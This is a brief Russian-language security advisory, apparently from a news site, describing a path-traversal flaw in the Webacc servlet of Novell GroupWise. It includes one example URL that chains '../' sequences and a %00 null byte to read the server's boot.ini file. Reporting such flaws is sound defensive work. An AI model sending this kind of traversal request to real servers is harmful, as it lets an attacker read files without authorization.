На сервере Novell GroupWise можно читать любые
файлы, компонента Webacc неправильно
обрабатывает пути и можно на сервере
прочитать любой файл.

Пример:

http://server:port/servlet/webacc?User.html=../../../../../../
../../boot.ini%00

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии